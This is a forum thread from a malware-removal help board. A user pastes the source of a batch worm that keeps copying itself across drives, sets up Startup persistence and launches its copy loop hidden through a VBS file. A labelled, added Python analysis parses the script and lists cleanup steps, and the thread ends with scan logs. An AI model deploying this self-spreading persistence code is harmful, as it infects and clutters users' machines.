TechSpot

Need help removing file

By blackclaw96
Mar 12, 2016
  1. I opened a .bat file named 'movie.bat' from a pen drive and it was copied into every drive partition. I tried deleting the copies, but the file appears immediately after deleting. The same happened after I deleted the files created in the startup folder. Please help me solve it.

    I couldn't upload the file, so I have copied the code here:



    @Echo off
    (echo @Echo off
    echo color 1a
    echo title @VIRUS = HR
    echo echo HAHAHA!!
    echo pause)>"%appdata%\Microsoft\windows\start menu\Programs\Startup\system.bat"
    (echo @Echo off
    echo :A
    echo copy /y %appdata%\movie.bat d:
    echo copy /y %appdata%\movie.bat e:
    echo copy /y %appdata%\movie.bat f:
    echo copy /y %appdata%\movie.bat g:
    echo copy /y %appdata%\movie.bat h:
    echo copy /y %appdata%\movie.bat I:
    echo copy /y %appdata%\movie.bat j:
    echo copy /y %appdata%\movie.bat k:
    echo copyta%\ /y %appdata%\movie.bat l:
    echo copy /y %appdata%\movie.bat m:
    echo copy /y %appdata%\movie.bat n:
    echo copy /y %appdata%\movie.bat o:
    echo copy /y %appdata%\movie.bat p:
    echo copy /y %appdata%\movie.bat q:
    echo copy /y %appdata%\movie.bat r:
    echo copy /y %appdata%\movie.bat s:
    echo copy /y %appdata%\movie.bat t:
    echo copy /y %appdata%\movie.bat u:
    echo goto A)>"%appdata%\vol.bat"
    (echo Set WshShell = CreateObject^("WScript.Shell"^)
    echo WshShell.Run chr^(34^) ^& "%appdata%\vol.bat" ^& Chr^(34^), 0
    echo Set WshShell = Nothing) > "%appdata%\Microsoft\windows\start menu\Programs\startup\windows.vbs"
    copy movie.bat %appdata%
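
An added example, not part of the original thread: a static triage in Python of the script quoted in the post above. It lists the files the script writes, which of them sit in the Startup folder, which contain a copy loop that keeps recreating the copies, and an order for removing them. `SAMPLE` is a trimmed copy of that script, and the function names and step wording are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Trimmed copy of the script quoted in the post (drive list cut to d: and e:).
SAMPLE = r'''@Echo off
(echo @Echo off
echo color 1a
echo title @VIRUS = HR
echo echo HAHAHA!!
echo pause)>"%appdata%\Microsoft\windows\start menu\Programs\Startup\system.bat"
(echo @Echo off
echo :A
echo copy /y %appdata%\movie.bat d:
echo copy /y %appdata%\movie.bat e:
echo goto A)>"%appdata%\vol.bat"
(echo Set WshShell = CreateObject^("WScript.Shell"^)
echo WshShell.Run chr^(34^) ^& "%appdata%\vol.bat" ^& Chr^(34^), 0
echo Set WshShell = Nothing) > "%appdata%\Microsoft\windows\start menu\Programs\startup\windows.vbs"
copy movie.bat %appdata%
'''

STARTUP = "\\start menu\\programs\\startup\\"
BLOCK_END = re.compile(r'^(?P<last>.*)\)\s*>\s*"(?P<path>[^"]+)"\s*$')
COPY = re.compile(r"^copy\s+(?:/y\s+)?(?P<src>\S+)\s+(?P<dst>\S+)$", re.I)

@dataclass
class Drop:
    path: str   # file the script writes
    body: list  # lines written into it, cmd.exe ^-escapes removed

def _payload(line):
    """Turn one 'echo ...' line of a redirected block into the text it writes."""
    line = line.lstrip("(")
    if line.lower().startswith("echo "):
        line = line[5:]
    return re.sub(r"\^(.)", r"\1", line)

def parse_drops(script):
    """Split a batch file into (echo ...)>"file" blocks and top-level commands."""
    drops, top, block = [], [], None
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        if block is None and line.startswith("("):
            block = []
        if block is None:
            top.append(line)
            continue
        end = BLOCK_END.match(line)
        if end:  # last line of the block carries the redirect target
            block.append(_payload(end.group("last")))
            drops.append(Drop(end.group("path"), block))
            block = None
        else:
            block.append(_payload(line))
    return drops, top

def analyze(script):
    drops, top = parse_drops(script)
    rep = {"autostart": [], "respawn_loops": [], "copy_targets": [],
           "hidden_launch": [], "staged_copy": []}
    for d in drops:
        if STARTUP in d.path.lower():
            rep["autostart"].append(d.path)
        labels = {l[1:].strip().lower() for l in d.body if l.startswith(":")}
        gotos = {l.split()[1].lower() for l in d.body
                 if l.lower().startswith("goto ")}
        copies = [m for m in map(COPY.match, d.body) if m]
        if copies and labels & gotos:  # copy commands inside a label/goto loop
            rep["respawn_loops"].append(d.path)
            rep["copy_targets"] += [m.group("dst") for m in copies]
        for line in d.body:
            # WshShell.Run "<file>", 0 starts <file> with a hidden window
            if ".run" in line.lower() and re.search(r",\s*0\s*$", line):
                rep["hidden_launch"] += [(d.path, o.path) for o in drops
                                         if o.path.lower() in line.lower()]
    rep["staged_copy"] = [(m.group("src"), m.group("dst"))
                          for m in map(COPY.match, top) if m]
    return rep

def cleanup_order(rep):
    """A running loop rewrites the copies, so it is stopped before any delete."""
    steps = [("stop process running", p) for p in rep["respawn_loops"]]
    steps += [("delete autostart file", p) for p in rep["autostart"]]
    steps += [("delete loop script", p) for p in rep["respawn_loops"]]
    steps += [(f"delete staged {src} in", dst) for src, dst in rep["staged_copy"]]
    steps += [("delete copy on", t) for t in rep["copy_targets"]]
    return steps

if __name__ == "__main__":
    for action, target in cleanup_order(analyze(SAMPLE)):
        print(f"{action}: {target}")
```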
     
  2. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    Welcome aboard

    Please complete all steps listed here: http://www.techspot.com/vb/topic58138.html
    Make sure you PASTE all logs. If a log exceeds the 50,000-character post limit, split it between a couple of replies.
    Attached logs won't be reviewed.

    Please observe the following rules:
    • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
    • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good, or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
     
  3. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
    Ran by WELCOME (2016-03-13 13:19:48)
    Running from C:\Users\WELCOME\Desktop
    Windows 7 Ultimate Service Pack 1 (X64) (2015-09-05 15:38:06)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-3006523739-2206101463-1198655294-500 - Administrator - Disabled)
    Guest (S-1-5-21-3006523739-2206101463-1198655294-501 - Limited - Disabled) => C:\Users\Guest
    HomeGroupUser$ (S-1-5-21-3006523739-2206101463-1198655294-1002 - Limited - Enabled)
    WELCOME (S-1-5-21-3006523739-2206101463-1198655294-1000 - Administrator - Enabled) => C:\Users\WELCOME

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Panda Cloud Antivirus (Enabled - Up to date) {3456760B-FDAA-FFFD-06C2-7BB528D2066C}
    AS: Panda Cloud Antivirus (Enabled - Up to date) {8F3797EF-DB90-F073-3C72-40C753554CD1}
    AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Panda Cloud Firewall (Disabled) {0C6DF72E-B7C5-FEA5-2D9D-D280D6014117}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
    Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
    Adobe Flash Player 19 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 19.0.0.207 - Adobe Systems Incorporated)
    Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
    Adobe InDesign CC 2014 (HKLM-x32\...\{CCDCB9C4-72BA-1014-A3F8-D123F2F18BC2}) (Version: 10.0 - Adobe Systems Incorporated)
    Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
    Adobe Photoshop Lightroom 5.3 64-bit (HKLM\...\{2DD71ACB-552D-402C-9529-7906ACB95C30}) (Version: 5.3.1 - Adobe Systems Incorporated)
    Adobe Premiere Pro CC 2014 (HKLM-x32\...\{07BE616F-9E42-4C90-AF4F-0F32A5B088E7}) (Version: 8.0.1 - Adobe Systems Incorporated)
    AirDroid 3.2.0.0 (HKLM-x32\...\AirDroid) (Version: 3.2.0.0 - Sand Studio)
    Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{2F72F540-1F60-4266-9506-952B21D6640D}) (Version: 6.1.0.13 - Apple Inc.)
    Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
    Autodesk 360 (HKLM\...\{556966D9-F7F6-421B-9707-D07901604DDF}) (Version: 5.0.29.1101 - Autodesk)
    Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 1.0.59.0 - Autodesk)
    Autodesk Design Review 2013 (HKLM-x32\...\Autodesk Design Review 2013) (Version: 13.0.0.82 - Autodesk, Inc.)
    Autodesk Design Review 2013 (x32 Version: 13.0.0.82 - Autodesk, Inc.) Hidden
    Autodesk Inventor Content Center Libraries 2015 (Desktop Content) (HKLM\...\{B46DECD1-1964-4EF1-0000-22D71E81877C}) (Version: 19.0.15900.0000 - Autodesk)
    Autodesk Inventor Professional 2015 - English (HKLM\...\Autodesk Inventor Professional 2015) (Version: 19.0.15900.0000 - Autodesk)
    Autodesk Inventor Professional 2015 (Version: 19.0.15900.0000 - Autodesk) Hidden
    Autodesk Inventor Professional 2015 English Language Pack (Version: 19.0.15900.0000 - Autodesk) Hidden
    Autodesk Material Library 2015 (HKLM-x32\...\{427F733F-4D6C-45BC-9324-EB743104C321}) (Version: 5.2.9.100 - Autodesk)
    Autodesk Material Library Base Resolution Image Library 2015 (HKLM-x32\...\{ABE2F70B-8D94-44E9-AA04-F0DB35063D62}) (Version: 5.2.9.100 - Autodesk)
    Autodesk Material Library Low Resolution Image Library 2015 (HKLM-x32\...\{4FBC9635-AC56-4378-8FDE-C4D3ED072681}) (Version: 5.2.9.100 - Autodesk)
    Autodesk ReCap (HKLM\...\Autodesk ReCap) (Version: 1.3.1.39 - Autodesk)
    Autodesk ReCap (Version: 1.3.1.39 - Autodesk) Hidden
    Autodesk Revit Interoperability for Inventor 2015 (HKLM\...\Autodesk Revit Interoperability for Inventor 2015) (Version: 15.0.107.0 - Autodesk)
    Autodesk Revit Interoperability for Inventor 2015 (Version: 15.0.107.0 - Autodesk) Hidden
    Autodesk Vault Basic 2015 (Client) (HKLM\...\Autodesk Vault Basic 2015 (Client)) (Version: 19.0.49.0 - Autodesk)
    Autodesk Vault Basic 2015 (Client) (Version: 19.0.49.0 - Autodesk) Hidden
    Autodesk Vault Basic 2015 (Client) English Language Pack (Version: 19.0.49.0 - Autodesk) Hidden
    BitMeter (HKLM-x32\...\BitMeter) (Version: - )
    BlueStacks App Player (HKLM-x32\...\{F4224F2B-8E51-42F9-9C2A-EF22C5FC6777}) (Version: 0.9.4.4078 - BlueStack Systems, Inc.)
    Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
    CCleaner (HKLM\...\CCleaner) (Version: 5.08 - Piriform)
    CheVolume 0.4.0.2 (HKLM-x32\...\CheVolume 0.4.0.2) (Version: - WellWeWeb)
    Configurator 360 addin (HKLM-x32\...\{8FE324B0-B934-4D68-BAB5-DE2136036237}) (Version: 19.0.11300.9000 - Autodesk, Inc.)
    CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.2109.0 - CyberLink Corp.)
    CyberLink PowerDirector 12 (Version: 12.0.2109.0 - CyberLink Corp.) Hidden
    DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.45.3.0297 - DT Soft Ltd)
    Defraggler (HKLM\...\Defraggler) (Version: 2.18 - Piriform)
    DVDFab 9.1.8.8 (13/02/2015) (HKLM-x32\...\DVDFab 9_is1) (Version: - Fengtao Software Inc.)
    Eco Materials Adviser for Autodesk Inventor 2015 (64-bit) (HKLM\...\{2F7441CB-A646-41F1-B1CB-518AB311138B}) (Version: 5.1.2.0 - Granta Design Limited)
    FARO LS 1.1.502.0 (64bit) (HKLM-x32\...\{66D83FE0-D798-4B38-86FE-FB48151E5AEF}) (Version: 5.2.0.35213 - FARO Scanner Production)
    FormatFactory 2.30 (HKLM-x32\...\FormatFactory) (Version: 2.30 - Free Time)
    Free Alarm Clock (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 4.0.1.0 - Comfort Software Group)
    Futuremark SystemInfo (HKLM-x32\...\{BEE64C14-BEF1-4610-8A68-A16EAA47B882}) (Version: 4.17.0 - Futuremark Corporation)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.21.115 - Google Inc.) Hidden
    Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
    Greenshot 1.1.7.17 (HKLM\...\Greenshot_is1) (Version: 1.1.7.17 - Greenshot)
    Halo 2 for Windows Vista (HKLM-x32\...\Halo 2) (Version: - Microsoft Game Studios)
    Halo 2 for Windows Vista (x32 Version: 1.0.0.0 - Microsoft Corporation) Hidden
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.4264 - Intel Corporation)
    Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.0.16 - Intel Corporation)
    Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
    iTunes (HKLM\...\{76FF0F03-B707-4332-B5D1-A56C8303514E}) (Version: 11.0.4.4 - Apple Inc.)
    Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
    Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
    Microsoft Games for Windows - LIVE (HKLM-x32\...\{F112F66E-25CA-42DD-983C-6118EB38F606}) (Version: 3.0.89.0 - Microsoft Corporation)
    Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{2E660A2A-A55F-43CD-9F73-CAD7382EEB78}) (Version: 3.0.19.0 - Microsoft Corporation)
    Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
    Mockup 360 Addin 2015 (HKLM-x32\...\{E4D4242C-FC14-4B4F-B1D9-6760D8C241D5}) (Version: 1.1.0 - Autodesk)
    Mozilla Firefox 40.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 40.0 (x86 en-US)) (Version: 40.0 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0 - Mozilla)
    MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
    MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
    My WIFI Router (HKLM-x32\...\My WIFI Router) (Version: 3.0.064-1201-001 - TxNetwork, Inc.)
    Need for Speed Most Wanted (HKLM-x32\...\Need for Speed Most Wanted_R.G. Mechanics_is1) (Version: - R.G. Mechanics, Panky)
    Nero 2014 (HKLM-x32\...\{F384C1E1-3A16-4073-95C3-7271FE0ED4C2}) (Version: 15.0.02200 - Nero AG)
    NewBlue Video Essentials for PowerDirector (HKLM\...\NewBlue Video Essentials for Cyberlink) (Version: 3.0 - NewBlue)
    Noise Reduction Plug-In 2.0 (HKLM-x32\...\{36DF4580-D1B3-11E3-A23E-F04DA23A5C58}) (Version: 2.0.628 - Sony)
    Panda Cloud Antivirus (HKLM-x32\...\Panda Universal Agent Endpoint) (Version: 3.0.1 - Panda Security)
    Panda Cloud Antivirus (Version: 7.05.00.0000 - Panda Security) Hidden
    Panda Devices Agent (HKLM-x32\...\Panda Devices Agent) (Version: 1.03.01 - Panda Security)
    Panda Devices Agent (x32 Version: 1.04.00 - Panda Security) Hidden
    Panda Security Toolbar (HKLM-x32\...\pandasecuritytb) (Version: 4.2.0.10 - Panda Security)
    Panda Security URL Filtering (HKLM-x32\...\Panda Security URL Filtering) (Version: 2.0.1.4 - Panda Security)
    Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
    PowerISO (HKLM-x32\...\PowerISO) (Version: - )
    Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden
    Pushbullet version 338 (HKLM-x32\...\{7578F204-49E7-4830-B051-14C23F408BFE}_is1) (Version: 338 - Pushbullet Inc)
    Rainmeter (HKLM-x32\...\Rainmeter) (Version: 3.3 r2519 - )
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.82.317.2014 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7200 - Realtek Semiconductor Corp.)
    Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
    Sniper Elite V2 (HKLM-x32\...\Sniper Elite V2_is1) (Version: - )
    Sound Forge Pro 11.0 (HKLM-x32\...\{3F1EEA40-9515-11E4-9B3B-F04DA23A5C58}) (Version: 11.0.299 - Sony)
    SoundWire Server version 2.1.2 (HKLM-x32\...\{E15658BC-7742-4397-999F-98B1BD11B784}_is1) (Version: 2.1.2 - GeorgieLabs)
    SpeedBit Video Accelerator (HKLM-x32\...\SpeedBit Video Accelerator) (Version: 3380(build_3064) - SpeedBit Ltd.)
    TeraCopy 2.27 (HKLM\...\TeraCopy_is1) (Version: - Code Sector)
    TP-LINK TL-WN725N_TL-WN723N Driver (HKLM-x32\...\{3C3F9CEB-2C5A-4A47-8EAA-DA76037546BA}) (Version: 1.3.1 - TP-LINK)
    TP-LINK Wireless Configuration Utility (HKLM-x32\...\{319D91C6-3D44-436C-9F79-36C0D22372DC}) (Version: 1.3.1 - TP-LINK)
    USB Debugging Driver (HKLM\...\{B61F9010-3474-11E4-8C21-0800200C9A66}) (Version: 1.0.4 - Invisibility Ltd)
    UxStyle Core Beta (HKLM\...\{8E363055-15E5-4D8A-9C69-A0A9DE9A3337}) (Version: 0.2.1.1 - The Within Network, LLC)
    Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{6DA2B636-698A-3294-BF4A-B5E11B238CDD}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{8CCEA24C-51AE-3B71-9092-7D0C44DDA2DF}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{C3A57BB3-9AA6-3F6F-9395-6C062BDD5FC4}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{F6F09DD8-F39B-3A16-ADB9-C9E6B56903F9}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{04B34E21-5BEE-3D2B-8D3D-E3E80D253F64}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{14866AAD-1F23-39AC-A62B-7091ED1ADE64}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{4B90093A-5D9C-3956-8ABB-95848BE6EFAD}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{B42E259C-E4D4-37F1-A1B2-EB9C4FC5A04D}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    Winamp (HKLM-x32\...\Winamp) (Version: 5.623 - Nullsoft, Inc)
    Winamp Detector Plug-in (HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
    Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (12/06/2010 4.0.0000.00000) (HKLM\...\76F6B4A696B8C9A7ACFF01D4E1D6EF2D974C3E67) (Version: 12/06/2010 4.0.0000.00000 - Google, Inc.)
    Windows Driver Package - Invisibility Ltd (WinUSB) AndroidUsbDeviceClass (08/27/2012 7.0.0000.00005) (HKLM\...\8A4E2C1CC86657295291BAC6A1C2C1718C9BE52C) (Version: 08/27/2012 7.0.0000.00005 - Invisibility Ltd)
    Windows Driver Package - MediaTek Inc. (usbser) Ports (01/05/2012 2.0000.0.1) (HKLM\...\49D9ABA9270C5BDFD7AE1BEB607D36B26BB90235) (Version: 01/05/2012 2.0000.0.1 - MediaTek Inc.)
    Windows Driver Package - MediaTek Inc. (usbser) Ports (09/01/2011 2.0.1136.0) (HKLM\...\32DC281B7E359EA3D16ECC7D98609F6A592B981D) (Version: 09/01/2011 2.0.1136.0 - MediaTek Inc.)
    Windows Driver Package - MediaTek Inc. (usbser) Ports (12/24/2011 2.0000.0.0) (HKLM\...\D0E6296D177F42BB31C0200E49412003DB6C4633) (Version: 12/24/2011 2.0000.0.0 - MediaTek Inc.)
    Windows Driver Package - MediaTek Inc. Net (07/14/2011 1.1129.00) (HKLM\...\89BF901AB9E67C6D8D35E49F33EBEA28C8B5F658) (Version: 07/14/2011 1.1129.00 - MediaTek Inc.)
    Windows Driver Package - Microsoft (WUDFRd) WPD (02/22/2006 5.2.5326.4762) (HKLM\...\B77DDB8A5697AAF5DA4E4859E53C301B877DD206) (Version: 02/22/2006 5.2.5326.4762 - Microsoft)
    WinRAR 5.30 beta 2 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.2 - win.rar GmbH)
    Winrar Activator version 1.2 (HKLM-x32\...\{AE0B3F2A-EB65-4D01-A3E1-6D879C6AAF2A}_is1) (Version: 1.2 - Rarlab)
     
  4. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{81D07C3D-0350-11D3-B7C2-0060B0EC020B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxAppCtrl.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{834CE679-2E47-49DE-9E41-FEC87E9192EB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8421A29C-54B8-11D1-9837-0060B03C43C8}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\SolidObject.Dll ()
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{846217D0-8954-11D2-8DCD-0060B0C32531}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\UCxTextBtn.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{846217D1-8954-11D2-8DCD-0060B0C32531}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\UCxTextBtn.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{849AFB5B-D6C9-4924-A712-F7118FF9611F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{85452F88-5071-492E-B850-2E3C586DCBD8}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{87F5CF8F-A06D-498F-A05F-E520E6B570DB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{89F0FC31-3B1D-494B-A75B-6BD4FA527B8A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8AA16DFC-DFC6-4B51-8FA2-A5D812BE33BF}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8B0E6BD9-610C-11D1-9842-0060B03C43C8}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\SolidObject.Dll ()
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\TestServer.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8ED07FEF-E1B0-4CC3-B2BA-D354828AB952}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{97E17F04-17DF-11d5-BC38-0010B5891E89}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\BodyReceiver.dll ()
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{988F4102-E6E3-4282-ACAC-55270827F2A8}\InprocServer32 -> axdb.dll => No File
